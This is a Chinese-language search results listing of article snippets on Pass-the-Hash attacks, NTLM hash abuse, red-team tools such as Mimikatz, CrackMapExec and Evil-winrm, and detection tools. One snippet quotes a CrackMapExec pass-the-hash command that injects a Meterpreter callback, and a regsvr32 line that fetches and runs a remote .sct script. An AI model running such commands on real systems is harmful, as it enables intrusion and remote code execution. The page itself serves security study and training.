首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏谢公子学安全

    内网渗透 | 哈希传递攻击(Pass-the-Hash,PtH)

    免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!

    3.9K10编辑于 2022-01-19
  • 来自专栏FreeBuf

    微软已修复可窃取Windows登录凭证的秘密漏洞

    显然,微软提供的补丁并没有真正修复关于SCF 文件的自动执行,Juan Diego 虽然无法给出解释根由但致力于修补一个存在二十年之久、且被称之为 pass-the-hash 的攻击, 它能自动共享 NTLM 哈希与服务器位于用户的外部网络;类似这样的问题在很多针对 Windows 的攻击中都有体现;比如,在今年春季, pass-the-hash 结合 Chrome 与 SCF文件来窃取用户凭据, 且在 2015 、16年,pass-the-hash 攻击均有出现过。 Stefan 表示其实有更多的方法能破解 pass-the-hash 攻击。相应的,Diego 也给出支持性回应表示正在研究相关破解方法。 当然,最好最直接的还是不要分享无需密码的文件。

    1.1K100发布于 2018-02-26
  • 来自专栏FreeBuf

    如何使用Ketshash检测可疑的特权NTLM连接

     关于Ketshash  Ketshash是一款针对NTLM安全的分析与检测工具,该工具可以帮助广大研究人员基于事件查看器日志来分析和检测可疑的特权NTLM连接,尤其是Pass-The-Hash攻击。 该工具作为“Pass-The-Hash detection”研究的一部分,以完整开源的形式发布给广大研究人员使用。

    1.1K50编辑于 2023-02-24
  • 来自专栏红队蓝军

    ATT&CK实战框架-Lab12重磅发布!挑战深度仿真内网,玩转NTLM、信息收集、横向移动与域渗透全链条!

    NTLM认证攻防:权限流转的命脉 深度聚焦NTLM协议攻击面 实战NTLM Relay(SMB/HTTP中继) 利用Responder进行LLMNR/NBT-NS投毒 掌握Pass-The-Hash和Pass-The-Ticket

    51710编辑于 2025-08-12
  • 来自专栏Khan安全团队

    自动利用 BloodHound 显示的 Active Directory 权限升级路径的工具

    执行使用bloodyAD包找到的路径 由于 autobloody 依赖于bloodyAD,它支持使用明文密码、pass-the-hash、pass-the-ticket 或证书进行身份验证,并绑定到域控制器的

    1.1K20编辑于 2023-02-23
  • 来自专栏FreeBuf

    Windows渗透测试工具:RedSnarf

    占用更小的空间内存(工具代码量小于500行) 减少服务器上的操作频率 模块化 线程化 RedSnarf功能包括: 检索本地SAM散列 枚举当前以系统权限运行的用户及其相应的lsa密码; 检索MS缓存凭证; Pass-the-hash

    1.3K71发布于 2018-02-26
  • 来自专栏编程

    Windows渗透测试工具:RedSnarf

    占用更小的空间内存(工具代码量小于500行) 减少服务器上的操作频率 模块化 线程化 RedSnarf功能包括: 检索本地SAM散列 枚举当前以系统权限运行的用户及其相应的lsa密码; 检索MS缓存凭证; Pass-the-hash

    1.6K70发布于 2018-02-02
  • APT43网络间谍组织全面解析:技术手段与防御策略

    技术手段与工具初始入侵:使用鱼叉式网络钓鱼邮件、社会工程学和恶意附件获取初始访问权限 持久化:部署自定义恶意软件、后门和远程访问木马(RAT)维持长期访问 横向移动:利用凭据窃取、哈希传递技术(Pass-the-Hash

    42700编辑于 2025-08-22
  • 来自专栏FreeBuf

    如何使用SharpNamedPipePTH实现令牌模拟

    关于SharpNamedPipePTH SharpNamedPipePTH是一款基于C#开发的安全工具,该工具可以利用哈希传递技术(Pass-the-Hash)在本地命名管道上进行身份认证,并实现用户令牌模拟

    2.3K10编辑于 2022-11-14
  • 来自专栏腾讯云安全专家服务

    PTH攻击(hash传递)

    PTH 即Pass-The-Hash,首先我们来说下为什么要使用HASH传递,一是再目标机>=win server 2012时,lsass.exe进程中是抓不到明文密码的,二是随着信息安全意识的提高,弱口令情况逐渐降低

    1.5K60编辑于 2022-03-09
  • 来自专栏谢公子学安全

    远程连接Windows系统

    对方主机需开启C共享,传送门:smbexec的使用(c$共享) WinRM远程连接:对方主机需开启WinRM服务,传送门:工具使用 | WinRM远程管理工具的使用 哈希传递攻击:内网渗透 | 哈希传递攻击(Pass-the-Hash

    11.3K20编辑于 2022-01-20
  • 来自专栏湛卢工作室

    除夕 | ATT&CK红队评估实战靶场vulnstack

    PTH (pass-the-hash)在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。

    3K20发布于 2020-02-14
  • 来自专栏鸿鹄实验室

    Empire学习

    Pass-the-hash 横向移动中的哈希传递: ? 外部模块 横向移动的一些常用模块: ? ? Persistence 权限维持 ? Empire to Meterpreter ?

    72320发布于 2021-04-15
  • 来自专栏FreeBuf

    如何使用Autobloody自动利用BloodHound显示的活动目录提权路径

    使用BloodHound数据和Neo4j查询来寻找最佳的权限提升路径; 2、使用bloodyAD包执行搜索到的提权路径; Autobloody基于bloodyAD实现其功能,而这个包支持使用明文密码、pass-the-hash

    1.8K10编辑于 2023-02-10
  • 来自专栏山丘安全攻防实验室

    域渗透之NTML-Hash

    这类hash并不能直接用于pass-the-hash攻击,但可以通过暴力破解的方式来获取明文密码。 在拿到hash之后,我们一般会考虑破解出hash明文密码,或者利用pass-the-hash技术在无需明文密码的情况下进行特权操作。 常用Pass-The-Hash工具: Crackmapexec Mimikatz smbmap smbexec metasploit cobaltstrike Crackmapexec 1.安装 crackmapexec administrator -H AFC44EE7351D61D00698796DA06B1EBF -M met_inject -o LHOST=17.10.0.1 LPORT=9999 命令的意思是通过pass-the-hash following command on the target machine: regsvr32 /s /n /u /i:http://17.10.0.1:8080/1KZkey.sct scrobj.dll 通过pass-the-hash

    5.3K53发布于 2020-03-06
  • 来自专栏Khan安全团队

    Active Directory 持久性 3:DSRM 持久性 v2

    这意味着一旦攻击者获得 DSRM 帐户的密码哈希,就可以使用 Pass-the-Hash 将其“传递”到 DC,以便管理员通过网络对 DC 进行有效访问。

    94010编辑于 2022-01-24
  • 来自专栏释然IT杂谈

    【Tools】黑客渗透超级管理终端Evil-winrm

    evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S NTLM哈希登录: 可以通过利用evil-winrm工具执行传递哈希攻击(Pass-The-Hash

    86900编辑于 2024-11-27
  • 来自专栏FreeBuf

    我们是如何发现针对欧洲政府的攻击

    这个请求可以用来恢复NTLM哈希来进行pass-the-hash攻击。 这种利用regsvr32来进行恶意攻击的技术被称为Squiblydoo,之前也有过相关介绍。

    79440发布于 2019-09-17
  • 来自专栏kali blog

    全网首发!Kali Linux 2025工具指南 凭证访问篇

    06 Pass-The-Hash Evil-winrm是一款使用ruby 语言开发的开源工具。

    36810编辑于 2025-11-17
  • 来自专栏漫流砂

    Mimikatz 用法详解

    file 这个模块可以读取已经打包的内存信息 比如我们之前已经将lsass 进程中的内存信息保存为dmp 文件了,那么此时我们可以离线的读取其中的信息了 需要制定文件名 sekurlsa::pth pass-the-hash

    4.5K30发布于 2020-08-20
领券